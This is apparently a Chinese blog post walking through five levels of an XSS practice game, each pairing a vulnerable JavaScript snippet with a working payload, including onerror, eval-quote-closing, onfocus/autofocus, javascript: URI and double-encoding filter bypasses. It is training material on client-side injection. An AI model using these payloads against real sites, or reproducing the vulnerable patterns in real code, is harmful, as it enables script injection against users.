xss 漏洞复现

最新推荐文章于 2024-08-23 11:26:45 发布
最新推荐文章于 2024-08-23 11:26:45 发布
阅读量385 收藏 5
点赞数 1
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yfy0308/article/details/141322398
版权

xss 漏洞复现

一,xss game

1,源码

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

题目分析:接收somebody参数放入innerHTML,然后放在

标签展示。innerHTML标签中警用了script标签,所以使用标签。

?somebody=<img src=1 onerror="alert(1337)">

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

2,源码

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

//eval(`ma = "Ma name a";alert(1337);""`)

题目分析:innertext会把<>当成字符串解析,安全系数很高,此题危险方法是eval,进行闭合操作。

思路一  ?jeff=a";alert(1337);"
思路二  ?jeff=a"-alert(1337);-"  连接符
       ?jeff=a"-alert(1337);"

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

3,源码

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')  //过滤了<>
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

题目分析:闭合"${wey}"处的双引号,加入我们的方法。

?wey=aaa"%20onfocus=alert(1337)%20autofocus="    
autofocus自动对焦
onfocus=alert(1337) 焦点存在时触发函数

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

4,源码

<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)  //两秒后自动提交
</script>

题目分析:表单的action处也会出现相应的伪协议事件,需要提交触发。

?ricardo=javascript:alert(1337)

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

5,源码

<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '') 
    will.innerHTML = smith
</script>

题目分析:过滤了()`\ 双层编码() %2528 %2529 浏览器会转一次。加location识别编码

?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

img%20src=1%20οnerrοr=location=“javascript:alert%25281337%2529”>


[外链图片转存中...(img-INiW5cpV-1724041595122)]
怎么都跑不快
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS漏洞复现(CVE-2017-12794)
m0_56578216的博客
08-30 393
前提条件:1.
XSS漏洞复现
qq_52016943的博客
07-27 1302
XSS绕过
Appcms存储型XSS漏洞复现
钟言的博客
03-10 4772
本篇为Appcms存储型XSS漏洞复现,采用多次注入的方式完成我们的payload注入,详细内容包含了环境介绍环境部署测试回显四、多次注入 1、第一条评论 2、第二条评论 3、管理员登录查看五、编写脚本获取cookie等内容
xss漏洞复现
m0_66022305的博客
09-04 303
客户端的脚本程序可以动态地检查和修改页面内容,而不依赖于服务器端的数据。因为这种攻击方式的注入代码是从目标服务器通过错误信息、搜索结果等等方式“反射”回来的:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。XSS的原理是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码,当用户浏览该页之时,嵌入其中 Web 里面的脚本代码会被执行,从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的。
swagger xss漏洞复现
一个努力学习网安的小牛马
04-26 940
漏洞? 不存在的
漏洞复现】Drupal XSS漏洞复现
过期的秋刀鱼
11-04 233
漏洞需要利用drupal文件模块上传文件的漏洞,伪造一个图片文件,上传,文件的内容实际是一段HTML代码,内嵌JS,这样其他用户在访问这个链接时,就可能触发XSS漏洞。将会看到drupal的安装页面,一路默认配置下一步安装。输入如下命令,即可使用PoC构造样本并完成上传功能,第一个参数为目标IP 第二个参数为目标端口。,默认存储名称为其原来的名称,所以之后在利用漏洞时,可以知道上传后的图片的具体位置。在火狐,Google,Edge浏览器都不行。在IE浏览器里触发XSS弹框。在IE浏览器里触发XSS弹框。
typecho存储型xss漏洞复现
m0_73299839的博客
07-26 367
之前搭博客的时候使用的是typecho,然后有看到文章说typecho
DVWA XSS漏洞复现
ch258563的博客
04-02 310
DVWA XSS漏洞复现
pikachu之xss漏洞复现
m0_54024658的博客
05-24 686
xss跨站脚本xss简介xss漏洞类型反射型存储型DOM型XSS攻击过程漏洞复现反射型XSS(get)存储型XSSDOM型XSS xss简介 XSS(跨站脚本)是一种发生在Web前端漏洞,所以其危害的对象也主要是前端用户,XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。因为对程序中输入和输出的控制不够严格,导致漏洞的形成。 xss漏洞类型 反射型 交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型 交互的数据会被存在数据库里面,
XSS漏洞总结和漏洞复现
weixin_45492087的博客
07-28 2327
跨站脚本攻击XSS(CrossSiteScripting),为区别层叠样式表(CascadingStyleSheets,CSS),所以改写为XSS
360提示[严重]Ecshop会员中心XSS漏洞修复.txt
02-02
360提示[严重]Ecshop会员中心XSS漏洞修复.txt 360提示[严重]Ecshop会员中心XSS漏洞修复.txt 360提示[严重]Ecshop会员中心XSS漏洞修复.txt
ourphp 站内信存储型xss漏洞1
08-04
漏洞复现复现漏洞,攻击者可以在会员中心>站内信件发送一封站内信,前提是攻击者知道其他用户的收件账号。攻击者可以构造payload为(0)>,然后发送站内信。当受害者打开该站内信时,攻击者的恶意代码将被触发,...
ok,boomer xss的dom破坏
xiaomi11133的博客
08-21 308
通过构造与setTimeout函数参数名相同的标签id,浏览器执行setTimeout函数时会查找HTML中id=ok的字符串类型的标签,而标签被调用时回一个表示标签的字符串即href属性中的值,因此setTimeout函数执行时会将标签中href属性的值tel:alert(1)当作代码来执行,利用该框架中白名单函数tel来执行。在HTML中,如果使用一些特定的属性名(id、name)给DOM元素命名,这些属性会在全局作用域中创建同名的全局变量,指向对应的DOM元素。
XSS-Jquery.html()+DOM破坏
2301_78549931的博客
08-20 958
关于两种方式:Jquery.html()和innerHTMl的区别我们用示例来看。
burpsuite xssValidator插件(xss插件)
最新发布
墨痕诉清风的博客
08-23 107
上边的两个链接都要下载(两个文件放在同一个文件夹下)修改完之后点击start attack开始扫描。下载好之后将phantomijs加入环境变量。3. 把数据包右键发送到 intruder。这里也修改一下,和上边的字符串保持一致。如果成功的话,这里会打勾。
XSS- - - DOM 破坏案例与靶场
m0_65466288的博客
08-20 971
这道题是将wey传进来的参数进行了一个过滤替换,将< >替换为空,放进input标签之中,那么我们的img、div等标签都不能用了,我们只能够在这个input标签中进行xss,还不能跟用户进行交互,那就只能使用事件来处理了,事件中有一个onfocus事件是聚焦,autofocus是自动聚焦,这样是不是就可以实现不进行交互的前提下触发这个事件。这6种字符的字符串,这些字符在 URL 中有特殊含义,或者可能与 URL 语法发生冲突,所以我们还需要进行urlcode编码。利用onerror事件来触发。
vulhub xss攻击复现
05-01
Vulhub是一个开源的靶场环境,其中包含很多常见漏洞复现环境。在使用Vulhub进行复现时,我们可以学习并掌握如何攻击及防御这些漏洞XSS攻击(跨站脚本攻击)是一种常见的Web安全漏洞,攻击者可以通过注入恶意脚本来窃取用户的敏感信息或者控制用户的浏览器。在Vulhub中,我们可以找到多种XSS漏洞复现环境,如DOM-XSS、反射型XSS等。 在进行XSS漏洞复现时,需要首先了解XSS攻击的原理和方式,然后根据复现环境中给出的提示或者源代码进行相关的操作。例如,在DOM-XSS漏洞复现环境中,我们需要使用浏览器的开发者工具查看网页源代码,并找到相关的input字段,然后输入恶意脚本,提交表单即可触发XSS攻击。 需要注意的是,在进行XSS漏洞复现时,我们需要对攻击的范围和影响有一个清晰的认识,同时不要直接在真实网站上进行测试,以免不必要的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值